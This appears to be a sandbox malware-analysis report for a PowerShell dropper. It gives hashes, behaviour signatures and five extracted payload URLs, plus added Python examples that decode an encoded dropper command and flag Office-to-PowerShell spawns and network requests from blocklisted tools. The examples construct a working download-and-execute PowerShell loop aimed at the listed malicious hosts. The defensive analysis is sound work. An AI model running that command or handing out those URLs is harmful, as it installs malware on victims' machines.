General

  • Target

    64c7721f214f2abeb9b18d6b6adfab0b_JaffaCakes118

  • Size

    157KB

  • Sample

    240521-z1qsdsae73

  • MD5

    64c7721f214f2abeb9b18d6b6adfab0b

  • SHA1

    7946456854dbc7d4a546fc9d76396f1291cddf2a

  • SHA256

    3053c3fb5e3a2c477da4be62dfa79116f69be8568bb10959ed03772b17045de1

  • SHA512

    0f0673320a759197b82b6e2aec1cabb419fadc48a299eb22c847dadc63e52038c3bd669d5128c3899d081c561a15b29329cebf439c57d5691ed721c6e90af581

  • SSDEEP

    3072:HxjnB29gb8onOJ1vxkZy8f/xiHm8VAzy3X7:Hxy7JbkZy8Xym8VAzy3X

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs (all typed exe.dropper)

    http://mikevictor.me/3pzsx
    http://faciusa.com/Qmb
    http://prahan.com/YNH
    http://lucianomoraes.com.br/BtDELY
    http://lcmtreinamento.com.br/RMd
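How a config extractor arrives at a list like the one above: the dropper is a PowerShell one-liner, usually handed to powershell.exe as -EncodedCommand (base64 of UTF-16LE text), and the payload URLs are recovered by decoding that argument and pulling the http(s) strings out of the script. The code below is an added example, not the report's own extractor and not the sample's script: the report does not reproduce the deobfuscated script, so the launch line is constructed here to carry the five exe.dropper URLs from the report in an '@'-joined, try-each-URL layout that is an assumption about the dropper, not a fact the report states.

```python
"""Recover dropper URLs from an encoded PowerShell launch line.

Added example, not code from the report or the sample. The launch line is
CONSTRUCTED: it embeds the report's five exe.dropper URLs in an assumed
'@'-joined download-then-run loop, which is not the sample's real script.
"""
import base64
import re
from urllib.parse import urlparse

# The five exe.dropper URLs from the report's extracted config.
PAYLOAD_URLS = [
    "http://mikevictor.me/3pzsx",
    "http://faciusa.com/Qmb",
    "http://prahan.com/YNH",
    "http://lucianomoraes.com.br/BtDELY",
    "http://lcmtreinamento.com.br/RMd",
]

# powershell.exe accepts -EncodedCommand and its unambiguous prefixes (-enc, -ec, -e);
# the argument is base64 of UTF-16LE text, so both steps are undone below.
_ENC_ARG = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)
# Stop a URL at whitespace, quotes and the separators droppers use between URLs.
_URL = re.compile(r"https?://[^\s'\"@;,)]+", re.I)


def build_encoded_command(urls):
    """Constructed stand-in for a dropper's -EncodedCommand argument (assumed layout)."""
    script = (
        "$u='" + "@".join(urls) + "'.Split('@');"
        "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
        "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
        "Start-Process $p;break}catch{}}"
    )
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script text, or None if there is no usable encoded argument."""
    m = _ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # bad base64 or not UTF-16LE
        return None


def extract_urls(script):
    """Every http(s) URL in the decoded script, in order of appearance, deduplicated."""
    seen, out = set(), []
    for u in _URL.findall(script):
        if u not in seen:
            seen.add(u)
            out.append(u)
    return out


def dropper_iocs(cmdline):
    """Launch line -> (urls, sorted hosts) ready for a blocklist; empty if nothing decodes."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return [], []
    urls = extract_urls(script)
    hosts = sorted({urlparse(u).hostname for u in urls})
    return urls, hosts


if __name__ == "__main__":
    launch = "powershell.exe -nop -w hidden -enc " + build_encoded_command(PAYLOAD_URLS)
    urls, hosts = dropper_iocs(launch)
    print("\n".join(urls))
    print(hosts)
```

On a real process-creation log the same `dropper_iocs` is run over the powershell.exe command line field; droppers that build the URL list from string concatenation or `-f` format operators will not decode this way and need the script executed in a sandbox or emulated instead, which is the case the report's "Deobfuscated" row would cover.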

Targets

    • Target

      64c7721f214f2abeb9b18d6b6adfab0b_JaffaCakes118

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Start PowerShell.
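The first two signatures are process-tree and network-attribution checks: an Office application spawning a script host, and a script host (which a workstation blocklist says should not be a downloader) then opening a network connection. The code below is an added example of that detection logic, not the sandbox's own rule set. The events are constructed in Sysmon terms (EventID 1 process create, EventID 3 network connect) with made-up PIDs and paths; the only value taken from the report is the first exe.dropper host.

```python
"""Flag Office -> script-host spawns and blocklisted-process network requests,
then chain them, over constructed Sysmon-style events.

Added example, not part of the report. EVENTS is CONSTRUCTED: PIDs, paths and
the encoded argument are made up; mikevictor.me is the first dropper host from
the report.
"""
from collections import namedtuple

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Processes that rarely need the network on a workstation and are commonly abused as downloaders.
NET_BLOCKLIST = {"powershell.exe", "pwsh.exe", "mshta.exe", "regsvr32.exe", "rundll32.exe",
                 "wscript.exe", "cscript.exe", "certutil.exe"}

EVENTS = [
    {"id": 1, "pid": 1520, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "ppid": 412, "parent_image": r"C:\Windows\explorer.exe", "cmdline": r'"WINWORD.EXE" /n invoice.doc'},
    {"id": 1, "pid": 2044, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ppid": 1520, "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "cmdline": "powershell -nop -w hidden -enc SQBFAFgA..."},  # placeholder, not a real payload
    {"id": 3, "pid": 2044, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "dst_host": "mikevictor.me", "dst_port": 80},
    {"id": 1, "pid": 3100, "image": r"C:\Windows\System32\cmd.exe", "ppid": 412,
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe"},  # benign: user-opened shell
    {"id": 3, "pid": 900, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "dst_host": "example.com", "dst_port": 443},  # benign: browser traffic
]

Finding = namedtuple("Finding", "rule pid detail")


def basename(path):
    """Case-insensitive file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def unexpected_children(events):
    """'Process spawned unexpected child process': Office parent -> script-host child."""
    return [
        Finding("office_spawns_script_host", e["pid"],
                f'{basename(e["parent_image"])} -> {basename(e["image"])}')
        for e in events
        if e["id"] == 1
        and basename(e["parent_image"]) in OFFICE_APPS
        and basename(e["image"]) in SCRIPT_HOSTS
    ]


def blocklisted_network(events):
    """'Blocklisted process makes network request': EventID 3 from a blocklisted image."""
    return [
        Finding("blocklisted_process_network", e["pid"],
                f'{basename(e["image"])} -> {e["dst_host"]}:{e["dst_port"]}')
        for e in events
        if e["id"] == 3 and basename(e["image"]) in NET_BLOCKLIST
    ]


def correlate(events):
    """The dropper pattern: a flagged child that then makes a blocklisted network request."""
    child_pids = {f.pid for f in unexpected_children(events)}
    return [f for f in blocklisted_network(events) if f.pid in child_pids]


if __name__ == "__main__":
    for f in unexpected_children(EVENTS) + blocklisted_network(EVENTS):
        print(f.rule, f.pid, f.detail)
    print("chained:", [f.pid for f in correlate(EVENTS)])
```

Each rule on its own has a false-positive tail (a macro developer legitimately starting PowerShell, a scheduled PowerShell job fetching updates); the chained version is the one worth a high-severity alert, which is why a sandbox that sees all three behaviours scores the sample 10/10 rather than summing three medium findings.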

MITRE ATT&CK Enterprise v15
